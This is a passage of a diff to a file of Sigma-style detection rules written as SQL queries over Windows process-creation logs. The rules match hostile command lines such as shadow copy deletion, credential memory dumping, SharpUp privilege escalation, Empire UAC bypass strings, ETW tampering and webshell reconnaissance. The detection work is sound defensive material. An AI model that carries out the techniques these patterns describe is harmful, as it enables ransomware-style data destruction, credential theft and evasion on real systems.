'%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" + "filename": "proc_creation_win_susp_disable_raccine.yml" }, { - "title": "HackTool - SecurityXploded Execution", - "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", - "status": "stable", - "description": "Detects the execution of SecurityXploded Tools", + "title": "HackTool - SharpUp PrivEsc Tool Execution", + "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", + "status": "experimental", + "description": "Detects the use of SharpUp, a tool for local privilege escalation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.privilege_escalation", + "attack.t1615", + "attack.t1569.002", + "attack.t1574.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Company = 'SecurityXploded' OR NewProcessName LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_secutyxploded.yml" + "filename": "proc_creation_win_hktl_sharpup.yml" }, { - "title": "Set Suspicious Files as System Files Using Attrib.EXE", - "id": "efec536f-72e8-4656-8960-5e85d091345b", - "status": "experimental", - "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Process Memory Dump via RdrLeakDiag.EXE", + "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "status": "test", + "description": "Detects the use of the Microsoft Windows Resource Leak Diagnostic tool \"rdrleakdiag.exe\" to dump process memory", + "author": "Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\') AND (CommandLine LIKE '% -o %' ESCAPE '\\' OR CommandLine LIKE '% /o %' ESCAPE '\\') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% /p %' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' OR OriginalFileName = 'RdrLeakDiag.exe') AND (CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_attrib_system_susp_paths.yml" + "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" }, { - "title": "Regsvr32 Spawning Explorer", - "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", - "status": "experimental", - "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", - "author": "elhoim", + "title": "Webshell Recon Detection Via CommandLine & Processes", + "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "status": "test", + "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", + "author": "Cian Heasley, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" + "filename": "proc_creation_win_webshell_recon_detection.yml" }, { - "title": "Trickbot Malware Activity", - "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "title": "HackTool - Empire PowerShell UAC Bypass", + "id": "3268b746-88d8-4cd3-bffc-30077d02c787", "status": "stable", - "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects some Empire PowerShell UAC bypass methods", + "author": "Ecco", "tags": [ - "attack.execution", - "attack.t1559" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_trickbot_wermgr.yml" + "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" }, { - "title": "UNC2452 Process Creation Patterns", - "id": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", + "title": "Invoke-Obfuscation Via Stdin", + "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", "status": "test", - "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -9174,320 +8942,296 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%7z.exe a -v500m -mx9 -r0 -p%' ESCAPE '\\' OR (ParentCommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%.vbs%' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%.dll,Tk\\_%' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /C %' ESCAPE '\\') OR (CommandLine LIKE '%rundll32 c:\\\\windows\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll %' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NOT (CommandLine IN (' ', '')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_unc2452_cmds.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" }, { - "title": "Suspicious WmiPrvse Child Process Spawned", - "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", + "title": "SOURGUM Actor Behaviours", + "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", "status": "test", - "description": "Detects suspicious and uncommon child processes of WmiPrvSE", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng", + "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", + "author": "MSTIC, FPT.EagleEye", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.t1546", + "attack.t1546.015", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" - }, - { - "title": "ZxShell Malware", - "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", - "status": "test", - "description": "Detects a ZxShell start by the called and well-known function name", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", - "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "attack.t1218.011", - "attack.s0412", - "attack.g0001" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((NewProcessName LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR NewProcessName LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_apt_zxshell.yml" + "filename": "proc_creation_win_apt_sourgrum.yml" }, { - "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", - "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", + "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", + "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", "status": "test", - "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.t1562.001", + "attack.t1070.001" ], "falsepositives": [ - "Legitimate administration activity" + "Legitimate deactivation by administrative staff", + "Installer tools that disable services, e.g. before log collection agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" + "filename": "proc_creation_win_logman_disable_eventlog.yml" }, { - "title": "Suspicious Microsoft Office Child Process", - "id": "438025f9-5856-4663-83f7-52f878a70a50", - "status": "test", - "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", - "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "title": "Suspicious PowerShell Mailbox Export to Share", + "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "status": "experimental", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_susp_child_processes.yml" + "filename": "proc_creation_win_powershell_mailboxexport_share.yml" }, { - "title": "Schtasks Creation Or Modification With SYSTEM Privileges", - "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", - "status": "experimental", - "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Control Panel Items", + "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "status": "test", + "description": "Detects the malicious use of a control panel item", + "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", "tags": [ "attack.execution", + "attack.defense_evasion", + "attack.t1218.002", "attack.persistence", - "attack.t1053.005" + "attack.t1546" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_schtasks_system.yml" + "filename": "proc_creation_win_control_panel_item.yml" }, { - "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", - "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", + "title": "Suspicious Parent of Csc.exe", + "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", "status": "test", - "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.defense_evasion", "attack.t1059.005", - "attack.t1059.001", - "attack.t1218" + "attack.t1059.007", + "attack.defense_evasion", + "attack.t1218.005", + "attack.t1027.004" ], "falsepositives": [ - "Administrative scripts", - "Microsoft SCCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csc.exe' 